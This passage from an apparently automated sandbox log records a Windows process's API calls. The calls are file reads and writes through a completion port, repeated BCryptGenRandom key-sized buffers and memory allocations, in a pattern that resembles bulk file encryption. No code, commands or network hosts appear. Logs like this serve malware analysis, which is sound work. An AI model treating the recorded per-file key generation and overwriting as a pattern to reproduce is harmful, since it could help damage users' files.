lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.194] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xe60, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.194] CloseHandle (hObject=0x3cc) returned 1 [0150.195] free (_Block=0x3d70450) [0150.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.217] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.217] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.217] free (_Block=0x3e305b8) [0150.217] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.217] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.217] free (_Block=0x1fa91d0) [0150.217] free (_Block=0x1fa2ed8) [0150.217] free (_Block=0x1fa90b8) [0150.217] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.229] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.229] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.229] free (_Block=0x3e305b8) [0150.229] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.229] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.229] free (_Block=0x1fa91d0) [0150.229] free (_Block=0x1fa2ed8) [0150.230] free (_Block=0x1fa90b8) [0150.230] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.245] CloseHandle (hObject=0x3cc) returned 1 [0150.246] free (_Block=0x3df0008) [0150.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.259] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x14ce, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.298] CloseHandle (hObject=0x2a8) returned 1 [0150.298] free (_Block=0x3d70450) [0150.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.313] CloseHandle (hObject=0x3cc) returned 1 [0150.313] free (_Block=0x3df0008) [0150.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.324] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.324] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.324] free (_Block=0x3e305b8) [0150.324] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.324] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.324] free (_Block=0x1fa91d0) [0150.324] free (_Block=0x1fa2ed8) [0150.324] free (_Block=0x1fa90b8) [0150.324] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.375] CloseHandle (hObject=0x3cc) returned 1 [0150.375] free (_Block=0x3df0008) [0150.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.383] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x84a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.392] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x8860, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0150.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.419] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6624, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.441] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xd6b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0150.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.466] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.466] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.466] free (_Block=0x3e305b8) [0150.466] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.466] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.466] free (_Block=0x1fa91d0) [0150.466] free (_Block=0x1fa2ed8) [0150.466] free (_Block=0x1fa90b8) [0150.466] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0150.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.482] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0xa520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0150.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.486] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa69e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.734] CloseHandle (hObject=0x308) returned 1 [0150.734] free (_Block=0x3df0008) [0150.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.746] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.746] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.747] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.747] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.747] free (_Block=0x3e305b8) [0150.747] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.747] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.748] free (_Block=0x1fa91d0) [0150.748] free (_Block=0x1fa2ed8) [0150.748] free (_Block=0x1fa90b8) [0150.748] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.758] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.758] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.758] free (_Block=0x3e305b8) [0150.758] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.758] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.759] free (_Block=0x1fa91d0) [0150.759] free (_Block=0x1fa2ed8) [0150.759] free (_Block=0x1fa90b8) [0150.759] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.779] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.791] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0150.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0150.792] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.792] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.792] free (_Block=0x3e305b8) [0150.792] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.792] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.793] free (_Block=0x1fa91d0) [0150.793] free (_Block=0x1fa2ed8) [0150.793] free (_Block=0x1fa90b8) [0150.793] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.793] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.807] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0150.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.821] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x14c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0150.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0150.831] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x7a46, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0151.931] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa0b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0151.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0151.949] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4f08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0151.959] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0151.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0151.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0151.970] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0151.970] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0151.970] free (_Block=0x3e305b8) [0151.970] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0151.970] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0151.970] free (_Block=0x1fa91d0) [0151.970] free (_Block=0x1fa2ed8) [0151.970] free (_Block=0x1fa90b8) [0151.970] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0151.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0151.981] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.982] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0151.982] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0151.982] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0151.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0151.985] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0151.985] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0151.985] free (_Block=0x3e305b8) [0151.985] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0151.985] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0151.986] free (_Block=0x1fa91d0) [0151.986] free (_Block=0x1fa2ed8) [0151.986] free (_Block=0x1fa90b8) [0151.986] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0151.986] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0152.000] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x3670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0152.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0152.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0152.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0152.010] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.010] free (_Block=0x3e305b8) [0152.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.010] calloc (_Count=0x82, 